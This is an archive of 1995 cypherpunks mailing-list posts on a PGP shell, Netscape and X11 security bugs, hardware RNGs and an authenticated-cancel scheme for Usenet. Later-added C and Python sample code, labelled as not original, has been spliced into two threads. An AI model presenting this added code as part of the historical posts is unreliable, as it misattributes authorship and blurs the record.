Date: Wed, 4 Oct 95 03:28:44 PDT
To: cypherpunks@toad.com
Subject: New Windoze PGP Shell (freeware)  worth checking out
Message-ID: <m0t0R8m-000HMgC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

AEgis Research (who I know nothing about) has come out with a very pleasant
windows front end for PGP. It is bone-head compliant, and even works well in
Win95. I'm only plugging because I was so impressed. Until Eudora has PGP
hooks, this is my shell of choice.

   Adam Philipp

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMHJgjm/ZTaRmpgTFAQGp+wf7BO36FpbAdLdDieORKldIe3MvPa8wUDpR
Rax38rxSP+aeR0toqtuldmWpfV5I+p40d+6pgWVfOKegS38Qt3k6rEt3r7C++Efi
PQZLOE3b4RHT5ZeS4klEZtwu1A8nTWMVZFkwcxTb6s+C3KYv9JxdXFHnrOPlnkcL
5AJhUDvznMnA1WhKmknNjXhGJH9FKtvNuTO/k1fmD6YwclqAbKBiuGwQduWqZfwI
0zGZlpSfbuZ6sCsbHFnw1wJIOONyAEr1dB5qhyV3rX00hm6KfSNsuGqwvlDhaOM9
lODlFwBVt+PJIRHVocCcCdp7/5ffE/hTIXoRNYYF0kcZTotJP05SXg==
=fvcQ
-----END PGP SIGNATURE-----

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 4 Oct 95 00:27:41 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031438.HAA06918@orac.engr.sgi.com>
Message-ID: <44td0c$3um@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510040204.WAA22162@clark.net>, rjc@clark.net (Ray Cromwell) writes:
> > In article <DFv6uo.4so@sgi.sgi.com>, Ray Cromwell <rjc@clark.net> writes:
> > 
> > > This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> > > as soon as the mail window pops up. I'm too tired right now to try to
> > > analyze it, but it might be another stack bug, this time, in the X
> > > libraries because Netscape isn't doing any sanity checking.
> > 
> > This is a bug in your X server, not in netscape.  The X server should
> > never crash no matter what you send to it.
> 
>   That's true, but it is also true that Netscape should also be
> performing some sanity checking on input rather than relying on 
> the supporting libraries to be secure. Remember, a hole is a hole.
> The last sendmail bug was a buffer overflow in syslog, however,
> sendmail still got patched to do bounds checking on the strings
> it was passing to syslog. 
> 
>   It looks like this is only a bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
> is it wise for netscape to be sending 10,000 character strings to GUI
> functions anyway? 

  While I agree that we should probably truncate this string to something
smaller than 10000 characters (I've already filed a bug on it here), it
is perfectly legal X protocol to send 10,000 characters to the X server.
How do I decide what is too long?  For example, when tracking down buffer
overflow problems for the security patch, we found an undocumented
static buffer limit of 64 bytes for the hostname passed to gethostbyname()
on IRIX.  Before we stumbled across this problem, we had a discussion
about what length we should truncate host names to.  People thought
that 128 characters was a reasonable limit, but it turned out that it
was too long.

  If the X server crash is what I think it is, it could still be hit
if we limit the string length, depending on the user's font selections
in their .Xdefaults.

  The fact is that if we are passing documented legal values into X,
unix, windows, or some other system software, we may still tickle
some bug in the system.  We can't test against every patch level of
every piece of software that our code may run against.  If that code
crashes it's a bug in that code, and there is little we can do about
it other than try to play by the documented rules.

  That said, there are probably still bugs in Netscape that will
cause it to crash.  We took care to try to find all such bugs that
occurred on the stack, which could be used to insert code and
jump to it.  That was the best we could do in the timeframe of
the security patch.  For 2.0 we are doing complete code reviews
to look for any sort of overflows, stack or not, as well as other
latent bugs.  We are also beefing up our QA to try to find more
of these types of bugs.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
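
The caller-side length check argued over in this thread, sketched as an added example (not Netscape's code and not written by any poster here): it rejects an over-long host name instead of truncating it, bounding the name by the RFC 1035 limits and by a caller-supplied cap that stands in for a callee limit such as the 64-byte buffer mentioned above. The names check_hostname, copy_hostname and check_run, and the cap parameter, are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* RFC 1035: a label is at most 63 octets and a name at most 255 octets on
 * the wire, which leaves 253 characters for the dotted text form. */
#define DNS_LABEL_MAX 63
#define DNS_NAME_MAX  253

enum host_check {
    HOST_OK = 0,
    HOST_EMPTY,
    HOST_TOO_LONG,        /* longer than the cap or than DNS_NAME_MAX */
    HOST_LABEL_TOO_LONG,
    HOST_BAD_CHAR,        /* not a letter, digit, hyphen or dot */
    HOST_BAD_LABEL        /* empty label, or label starts/ends with '-' */
};

static int is_ldh(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '-';
}

/* Validate a NUL-terminated, untrusted host name. cap (an assumption of this
 * example) is the longest name the callee is known to accept. The scan stops
 * at the first violation, so a 10,000-character input costs a bounded read. */
enum host_check check_hostname(const char *s, size_t cap)
{
    size_t limit = cap < DNS_NAME_MAX ? cap : DNS_NAME_MAX;
    size_t i, label_len = 0;

    if (s == NULL || s[0] == '\0')
        return HOST_EMPTY;
    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];

        if (i >= limit)
            return HOST_TOO_LONG;
        if (c == '.') {
            if (label_len == 0 || s[i - 1] == '-')
                return HOST_BAD_LABEL;
            label_len = 0;
            continue;
        }
        if (!is_ldh(c))
            return HOST_BAD_CHAR;
        if (c == '-' && label_len == 0)
            return HOST_BAD_LABEL;
        if (++label_len > DNS_LABEL_MAX)
            return HOST_LABEL_TOO_LONG;
    }
    if (s[i - 1] == '-')            /* final label ends with a hyphen */
        return HOST_BAD_LABEL;
    return HOST_OK;                 /* a single trailing dot is accepted */
}

/* Copy src into dst only if it validates and fits together with its NUL.
 * Nothing is truncated: a shortened host name is a different host name.
 * dst is left as an empty string on rejection. */
enum host_check copy_hostname(char *dst, size_t dstsz, const char *src,
                              size_t cap)
{
    enum host_check rc;

    if (dst == NULL || dstsz == 0)
        return HOST_TOO_LONG;
    dst[0] = '\0';
    if (cap > dstsz - 1)            /* the destination also bounds the length */
        cap = dstsz - 1;
    rc = check_hostname(src, cap);
    if (rc != HOST_OK)
        return rc;
    memcpy(dst, src, strlen(src) + 1);  /* length already proven <= cap */
    return HOST_OK;
}

/* Constructed input: check a name made of n copies of 'a'. */
enum host_check check_run(size_t n, size_t cap)
{
    char *s = malloc(n + 1);
    enum host_check rc;

    if (s == NULL)
        return HOST_EMPTY;
    memset(s, 'a', n);
    s[n] = '\0';
    rc = check_hostname(s, cap);
    free(s);
    return rc;
}

int main(void)
{
    char buf[64];   /* constructed stand-in for a callee's 64-byte buffer */

    printf("%d\n", (int)copy_hostname(buf, sizeof buf, "home.netscape.com", 253));
    printf("%d\n", (int)check_run(64, sizeof buf - 1));   /* HOST_TOO_LONG */
    printf("%d\n", (int)check_run(10000, 253));           /* HOST_LABEL_TOO_LONG */
    return 0;
}
```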




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Wed, 4 Oct 95 09:35:25 PDT
To: roy@cybrspc.mn.org
Subject: Re: About that simple hardware RNG
In-Reply-To: <951003.173054.7O1.rnr.w165w@cybrspc.mn.org>
Message-ID: <95Oct4.075144edt.1878@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The idea:  noise from an avalanching diode is applied to the input of an
> 8 bit shift register.  The SR is clocked at some fairly high sampling
> rate.  The 8 bits are made available on the printer port.
The shift register and timer probably involves 2 microchips.  Why not just
use 8 avalanching diodes, one for each bit?  In fact, you can use 13 if you
use the other printer-port input lines.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 4 Oct 95 04:56:55 PDT
To: cypherpunks@toad.com
Subject: (fwd) ETO Trade Points : Correction
Message-ID: <v02120d02ac9826f42d2a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 4 Oct 95 07:49:16 -0400
From: "GORD JENKINS" <jenkins@fox.nstn.ca>
X-Minuet-Version: Minuet1.0_Beta_14.1
Reply-To: <JENKINS@fox.nstn.ca>
X-Popmail-Charset: English
To: www-buyinfo@allegra.att.com
Subject: ETO Trade Points : Correction


Subject: ETO Trade Points

I made a mistake in the Web site address.
The correct address is
 http://www.unicc.org/untpdc
Thanks
Gordon Jenkins
 --
 GORD JENKINS
e mail  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938
------ Forwarded message ends here ------
 --
 GORD JENKINS
e mail  JENKINS@fox.nstn.ca
tel 613 794 6735
fax 613 723 8938

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 4 Oct 95 08:18:52 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510031438.HAA06918@orac.engr.sgi.com>
Message-ID: <199510041513.IAA01471@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510040204.WAA22162@clark.net>, Ray Cromwell <rjc@clark.net> writes:

>> This is a bug in your X server, not in netscape.  The X server should
>> never crash no matter what you send to it.

>   That's true, but it is also true that Netscape should also be
> performing some sanity checking on input rather than relying on 
> the supporting libraries to be secure. Remember, a hole is a hole.
> The last sendmail bug was a buffer overflow in syslog, however,
> sendmail still got patched to do bounds checking on the strings
> it was passing to syslog. 

>   It looks like this is only a bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
> is it wise for netscape to be sending 10,000 character strings to GUI
> functions anyway? 

It's absolutely okay for netscape to send long character strings to the
X server.  In fact, all it's probably doing is putting long character
strings into a Motif widget, which then sends them to the X server.
This is also totally okay.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@nando.net (Steve Champeon)
Date: Wed, 4 Oct 95 05:57:19 PDT
To: cypherpunks@toad.com
Subject: TidBITS article on Netscape
Message-ID: <v02120d01ac98422061df@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain



Geoff Duncan has written an article about the Netscape security
breach in TidBITS, an e-zine for Mac owners. Copies are available
at: 

ftp://ftp.tidbits.com/pub/tidbits/issues/1995/TidBITS#297_02-Oct-95.etx

The above version is formatted using Setext. HTML and text/plain
versions are also available. Mr. Young? Perhaps this could go into
the library?

Seems fair, if critical, and c2.org gets a mention. 

Steve







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 06:03:22 PDT
To: cypherpunks@toad.com
Subject: Telecommana
Message-ID: <199510041303.JAA00417@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-4-95.

   Jared Sandberg writes in The WSJ on a new Internet payment
   system by MasterCard, IBM, Netscape, CyberCash and GTE.
   Says the specs were published yesterday.

   Another WSJ report is on Lockheed Martin's proposal for a
   new communications satellite system.

   John Markoff writes in The NYT on AT&T's proposed new 12-
   satellites system. $ for Qualcomm.

   Another NYT piece is about "naysayers" of satellite
   services.

   And, Financial Times has a bountiful insert on Information
   Technology, with a lead story on Internet security, black-
   hearted hacking and, to the rescue, princely encryption and
   authentication. Or is the blanco prince a negro hacker?

   All these bleating for mana at Telecom 95 manana in gelt-
   berotten Geneva.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 4 Oct 95 06:56:34 PDT
To: cypherpunks@toad.com
Subject: Re: New Windoze PGP Shell (freeware)  worth checking out
Message-ID: <9509048128.AA812821174@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On October 4, 1995,
     Adam Philipp <adam@powergrid.electriciti.com> at Internet-USA
     wrote:
     
     AEgis Research (who I know nothing about) has come out with a very 
     pleasant windows front end for PGP. It is bone-head compliant...
     
     LYCOS had 1 entry for AEgis Research, but that page could not be found 
     on the cited server.
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 4 Oct 95 01:45:49 PDT
To: norm@netcom.com (Norman Hardy)
Subject: Re: The Evolution of Cooperation (Towards a mathematical theory of reputation?)
In-Reply-To: <ac97b7d503021004c5f9@DialupEudora>
Message-ID: <199510040842.JAA16000@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| I highly recommend Axelrod's short book, The Evolution of  Cooperation, for
| those (like me) who find it hard to think clearly about trust issues. You
| have probably heard about prisoner's dilemma, tit-for-tat etc. Axelrod is a
| very early worker in this field. He set up a tournament of programmed bugs
| that competed with each other in an artificial environment. They could
| survive only by cooperation with other bugs. They could also cheat.

I vaguely remember that Axelrod did a few interesting additional papers,
on things like geographical propagation of knowledge in iterated 
prisoner's dilemma, and of behaviour in which the 'bugs' had limited memory
as well.

Very interesting reading, I'd say. Does anyone know what he has done recently?

-Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Date: Wed, 4 Oct 95 07:50:54 PDT
To: Christian Wettergren <cwe@it.kth.se>
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <199510041102.MAA17689@piraya.electrum.kth.se>
Message-ID: <9510040947.ZM16462@pamd.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


good points, Christian!

more and more, networks are becoming flooded with X traffic.  although X
has always been known to be a potential security hole, i think X-attacks
are going to increase dramatically in the coming months.

i commonly hear of sites with Xauthority enabled, only to have the user
community type "xhost +" at the prompt.  bad karma.  the days of pumping
rude & crass noises to someone else's workstation will soon graduate to
more nefarious and insidious attacks.

is anyone looking into a means of securing X (above and beyond the current
weak solutions)?

regards,
--robert
--

o  robert owen thomas: unix consultant. cymro ydw i. user scratching post.  o
o       e-mail: Robert.Thomas@pamd.cig.mot.com --or-- robt@cymru.com        o
o               vox:  708.435.7076   fax:  708.435.7360                     o
o        "When I die, I want to go sleeping like my grandfather...          o
o              Not screaming like the passengers in his car."               o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Wed, 4 Oct 95 07:24:48 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Web "places" and the media monsters
In-Reply-To: <199509292319.QAA21372@netcom10.netcom.com>
Message-ID: <Pine.3.89.9510041010.A16263-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


A tiny correction to Vladimir's interesting posting. It wasn't J.Gilmore 
I quoted on the "Titanic deck chair" in the NY Times, it was J.Barlow, 
who indeed has a propensity for soundbyte. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 4 Oct 95 12:47:47 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <modemacDFr0qB.IyK@netcom.com>
Message-ID: <V0BgcD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


[alt.religion.scientology restored, since that's where most of the discussion
of forged cancels has been taking place so far ]

In article <44pmiq$h7t@segfault.monkeys.com>, rfg@monkeys.com (Ronald F. Guilmette) writes:

>In my opinion, the simple, obvious, and correct solution (which should have
>been implemented from day one, IMHO) is to modify the currently prevalent
>news processing packages (i.e. INN and Cnews) so that rather than physically
>removing canceled news article files from the directories where they exist,
>they are instead edited (by INN and/or Cnews) in place, and retained for
>future reference.

Because of the prevalence of forged cancels, my site just ignores all cancels.
Unfortunately, most other sites, including our feeds, honor forged cancels.

[Good suggestions skipped]

>Bottom line:  Article cancelations are known to be based upon highly in-
>secure mechanisms.  Forged cancels are becoming more common.  Many of
>these are desirable deletions of spam.  Others are problematic instances
>of untrustworthy individuals attempting to act as unelected news admini-
>strators for the entire Internet.  Until such time as more secure article
>cancelation mechanisms are put in place (and perhaps even afterwards)
>mechanisms which provide for the retention of adequate audit trails
>relating to canceled articles should be created and widely adopted.
>The current approach/convention/solution/mechanism of physically *deleting*
>an article file whenever _anybody_ on the world-wide Internet tells your
>news system to do so is simply not acceptable.

The cancellation mechanism described in RFC 1036 does not use digital
signatures, but is based on the honor system. RFC 1036 says in section 3.1:
"Only the author of the message or the local news administrator is allowed to
send this message." However no mechanism is provided to authenticate the origin
of a cancel. Of late, a small group of control freaks has abused this security
hole, claiming (with no basis in reality) that some sort of consensus permits
them to act as the self-appointed judges of the contents of other people's
Usenet articles, to impersonate other posters, and to distribute forged cancels
to other sites to censor the offending articles. E.g., one graduate student at
Lehigh University falsely claims to be a sysadmin and regularly forges cancels
for articles in n.a.n-a.m critical of his forgeries and other net-abuse; and
a criminal cult has been forging cancels for articles discussing its dogmas.

I'd like to remind everyone of the well-thought-out scheme for authenticating
cancels proposed some time ago by Taneli Hujskonen and Benjamin Franz, that can
also be integrated into a Lazarus-like system for tracing forged cancels.

Let H denote a one-way hash function (also known as message digest), such as
Ron Rivest's MD5 or Ralph Merkle's Snefru. Efficient source code to compute
them is readily available and not subject to export restrictions, unlike PGP.
Such functions have the property that it's easy (for a computer) to compute
M = H(N), but, for a given M, it's intractable to find N such that M = H(N).


Let the poster specify a secret passphrase whenever s/he posts an article.
This passphrase will be required to cancel the article. However it will not be
revealed by a cancel and can be reused. With user-friendly software, the
poster might store the passphrase in a profile and use the same passphrase for
all articles, or change it for every message.

When an article is posted, two quantities are computed by the posting program:
M1 = H(article body + newsgroups + message-id + date + passphrase) and
M2 = H(M1). The posted article contains the header "Cancel-lock: M2".

When an attempt is made to cancel/supersede an article X with a "Cancel-lock:"
header, the user is asked to supply the passphrase. The posting software
computes M1 = H(X's body + newsgroups + X's message-id + date + passphrase)
once again and adds the "Cancel-key: M1" header to the article containing
"Control: cancel <X>" or "Supersedes: <X>" that's being posted.

(Note that without knowing the passphrase it's intractable to match the M1.)


Whenever news server software (such as inn) detects either "Control: cancel
<X>" or "Supersedes: <X>", INN should retrieve the original article <X> and
look for the "Cancel-lock: M2" header. If one is found, then the old article
may be cancelled only if the new article contains the header "Cancel-key: M1"
such that H(M1) = M2.

If the cancel cannot be authenticated (e.g., because the original article lacks
the "Cancel-lock: M2" header, or the cancel lacks the "Cancel-key: M1" header
such that H(M1)=M2), then INN should forward the unauthenticated cancel to one
or more "collection centers" so the author of the original article may be
notified.

A site may choose to honor the unauthenticated cancel anyway if the article
being cancelled lacks the "Cancel-lock: M2" header, but should ignore it if
"Cancel-lock:" is found, but no matching "Cancel-key:" is given.


Each "collection center" daemon should wake up periodically (say, every hour),
group the collected unauthenticated cancels by message-ids of the cancelled
articles, and e-mail the (distinct) addresses (other than "usenet@*" or
"news@*") mentioned in the "From:", "Sender:", "Authorized:", and
"X-Cancelled-By:" headers, quoting the unauthenticated cancel and the Path's as
seen at many different sites that forwarded the cancels. This way, if the
unauthenticated cancel is indeed forged, its author will see within hours that
it has been fraudulently cancelled _and_ will automatically receive enough
"Path:" samples from all over the world to see where it was posted, by
comparing the "Path:" headers in several forwarded copies.


A user or an entire site can easily "opt out" of having "bona fide" cancels
reported by always using the proposed "Cancel-lock:/Cancel-Key:" headers.

This scheme would be upwardly compatible with all existing Usenet software.
It would also be compatible with the "NoCeM" proposal, where trusted censors
could issue digitally signed "advisory cancels" without impersonating the
original posters. Such advisory cancels would not be subject to hash checks.


---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
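
The Cancel-lock/Cancel-key exchange described in the message above, as an added example that is not part of the original post or of any news software. The field separator, the hex encoding of M1 and M2, the function names and the sample article are assumptions; MD5 is used only because the post names it as a candidate for H.

```python
import hashlib
import hmac


def H(data: bytes) -> str:
    """The one-way hash H of the post (MD5 is one of the two it names)."""
    return hashlib.md5(data).hexdigest()


def cancel_key(article: dict, passphrase: str) -> str:
    """M1 = H(article body + newsgroups + message-id + date + passphrase)."""
    # Assumption: "+" means concatenation; a NUL separator keeps fields unambiguous.
    fields = (article["Body"], article["Newsgroups"],
              article["Message-ID"], article["Date"], passphrase)
    return H("\0".join(fields).encode("utf-8"))


def cancel_lock(m1: str) -> str:
    """M2 = H(M1), the value published in the Cancel-lock: header."""
    # Assumption: H is taken over the hex text of M1 as it appears in the header.
    return H(m1.encode("utf-8"))


def post_article(article: dict, passphrase: str) -> dict:
    """Posting program: add 'Cancel-lock: M2' to the outgoing article."""
    posted = dict(article)
    posted["Cancel-lock"] = cancel_lock(cancel_key(article, passphrase))
    return posted


def build_cancel(original: dict, passphrase: str, sender: str) -> dict:
    """Cancelling program: recompute M1 and send it as 'Cancel-key: M1'."""
    return {"From": sender,
            "Control": "cancel " + original["Message-ID"],
            "Cancel-key": cancel_key(original, passphrase)}


def process_cancel(spool: dict, control: dict, honor_unlocked: bool = True):
    """Server side. Returns (action, report_to_collection_center)."""
    target = control["Control"].split(None, 1)[1]
    original = spool.get(target)
    if original is None:
        # Case not covered by the post: nothing in the spool to cancel.
        return ("no-such-article", False)
    lock = original.get("Cancel-lock")
    if lock is None:
        # No lock: cannot be authenticated, so it is reported; honoring is site policy.
        return ("cancel" if honor_unlocked else "ignore", True)
    key = control.get("Cancel-key")
    if key is not None and hmac.compare_digest(
            cancel_lock(key).encode("utf-8"), lock.encode("utf-8")):
        return ("cancel", False)          # H(M1) == M2: authenticated
    return ("ignore", True)               # lock present, key missing or wrong


# Constructed sample article (not real traffic).
SAMPLE = {
    "From": "author@example.org",
    "Newsgroups": "misc.test",
    "Message-ID": "<constructed.1@news.example>",
    "Date": "Wed, 4 Oct 95 12:00:00 GMT",
    "Body": "This is a constructed test article.\n",
}

if __name__ == "__main__":
    posted = post_article(SAMPLE, "correct horse")
    spool = {posted["Message-ID"]: posted}
    print(process_cancel(spool, build_cancel(posted, "correct horse", "author@example.org")))
    print(process_cancel(spool, build_cancel(posted, "a guess", "forger@example.net")))
```

Because M1 covers the message-id and date, reusing one passphrase across articles still yields a different Cancel-key for each, so publishing M1 in one cancel does not unlock any other article.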




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlsiil@attmail.com (Karl A Siil)
Date: Wed, 4 Oct 95 14:21:52 PDT
To: cypherpunks@toad.com
Subject: Re: New Windoze PGP Shell (freeware)  worth checking out
In-Reply-To: <m0t0R8m-000HMgC@powergrid.electriciti.com>
Message-ID: <winATT-2.7-karlsiil-1616>
MIME-Version: 1.0
Content-Type: text/plain


OK, I'll bite. Where do I get it? Where did you get your info? Do you have a 
copy?

					Karl A.Siil
					AT&T BCS
					Holmdel, NJ


------------- Begin Original Message -------------
Date: Wed Oct  4 03:26:58 -0700 1995
From: internet!powergrid.electriciti.com!adam (Adam Philipp)
Subject: New Windoze PGP Shell (freeware)  worth checking out
To: internet!toad.com!cypherpunks
Content-Type: Text
Content-Length: 1313

-----BEGIN PGP SIGNED MESSAGE-----

AEgis Research (who I know nothing about) has come out with a very pleasant
windows front end for PGP. It is bone-head compliant, and even works well in
Win95. I'm only plugging because I was so impressed. Until Eudora has PGP
hooks, this is my shell of choice.

   Adam Philipp

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 4 Oct 95 11:05:49 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <44td0c$3um@tera.mcom.com>
Message-ID: <199510041800.LAA07074@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> How do I decide what is too long?  For example, when tracking down buffer
> overflow problems for the security patch, we found an undocumented
> static buffer limit of 64 bytes for the hostname passed to gethostbyname()
> on IRIX.  Before we stumbled across this problem, we had a discussion
> about what length we should truncate host names to.  People thought
> that 128 characters was a reasonable limit, but it turned out that it
> was too long.


	Isn't there a resolver #define or something in limits.h called
MAXHOSTNAMELEN ? Something like that? (Perhaps not, but that's what I
recall..)

> latent bugs.  We are also beefing up our QA to try to find more
> of these types of bugs.
> 
	great!


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Wed, 4 Oct 95 09:11:38 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape hole without .Xauthority (fwd)
Message-ID: <199510041611.LAA20818@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


Robert Owen Thomas wrote:
> more and more, networks are becoming flooded with X traffic.  although X
> has always been known to be a potential security hole, i think X-attacks
> are going to increase dramatically in the coming months.
> 
> i commonly hear of sites with Xauthority enabled, only to have the user
> community type "xhost +" at the prompt.  bad karma.  the days of pumping
> rude & crass noises to someone else's workstation will soon graduate to
> more nefarious and insidious attacks.
> 
> is anyone looking into a means of securing X (above and beyond the current
> weak solutions)?
 
I have not used it for this purpose, but ssh claims to do "Secure X11
sessions."  

Actually, I'm interested in what the cypherpunks think of ssh in
general; I'm not able to do a strong analysis of the code myself.  If
it does everything it claims to do, it's a very powerful tool;
however, I don't know of any in-depth studies of ssh security.

-- 
Mike Gebis  gebis@ecn.purdue.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 08:17:16 PDT
To: cypherpunks@toad.com
Subject: FIZ_zle
Message-ID: <199510041517.LAA15917@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-4-95. W$Japer:


   "MasterCard, Backed by IBM and Others, Enters Fight for
   Internet-Payment Rules."

      MasterCard said it entered into a collaborative effort
      with IBM, Netscape, CyberCash and GTE to release a draft
      of technical requirements for any software companies and
      financial institutions that want to develop programs for
      electronic commerce.


   "Lockheed Plans Satellite System For $4 Billion."

      Lockheed Martin proposed to build a $4 billion satellite
      system for two-way global computer networking,
      videoconferencing and other on-demand services in a
      challenge to plans by the Hughes unit of GM and the
      separate Teledesic venture. Lockheed disclosed that it
      has filed for FCC authority to place nine large
      satellites in high-altitude orbits by about the year
      2000 to form a new system called Astrolink for
      high-data-rate transmissions.


   "Morgan Stanley Puts $200 Million In Telecom Venture."

      In an effort to ride the global telecommunications boom,
      Morgan Stanley Capital Partners is investing $200
      million in Sita Group in a move to allow the world-wide
      airline cooperative to create a for-profit
      telecommunications unit.


   Trinity:  FIZ_zle  (11 kb)

From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 08:18:44 PDT
To: cypherpunks@toad.com
Subject: PIZ_zaz
Message-ID: <199510041518.LAA16077@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-4-95. NYPaper:


   "AT&T Puts New Emphasis On Satellites. 12-Spacecraft
   Network Proposed to Regulators."

      The AT&T Corporation, in an early sign of how it plans
      to pursue its Internet and global communications
      strategy after the company's planned divestiture, has
      quietly filed a Federal application to build and launch
      a multibillion-dollar global satellite network. The
      system would let computer users bypass local telephone
      networks and connect directly to the Internet via
      satellite dish antennas slightly larger than two feet in
      diameter.


   "Satellite Services Hear the Naysayers."

      The concept has great promise: a string of satellites
      offering global wireless telephone service, where the
      caller is never out of range. Making the concept
      reality, however, is proving stubbornly difficult. The
      four major services in the nascent global wireless
      business are on the defensive for the first time in
      their brief history. A pair of troubled debt offerings
      have raised questions about the viability of so-called
      global personal communications.


   "A New Computer Dazzles a Jaded Industry Crowd."

      The BeBox is incompatible with everything now on the
      market. But the sheer dazzle of the new personal
      computer by Jean-Louis Gassee, the former engineering
      head of Apple Computer Inc., drew a standing ovation
      from a normally skeptical crowd of 500 of some of the
      most discerning executives in technology.


   Trio:  PIZ_zaz  (16 kb)

From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 4 Oct 95 11:23:15 PDT
To: cypherpunks@toad.com
Subject: Random number generators
Message-ID: <199510041822.LAA22783@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.uni-karlsruhe.de/~RNG/
>    Random number generators
> 
> --------------------------------------------------------------------
> This page is not yet available in German.
> --------------------------------------------------------------------
> 
> Classification of random numbers
> 
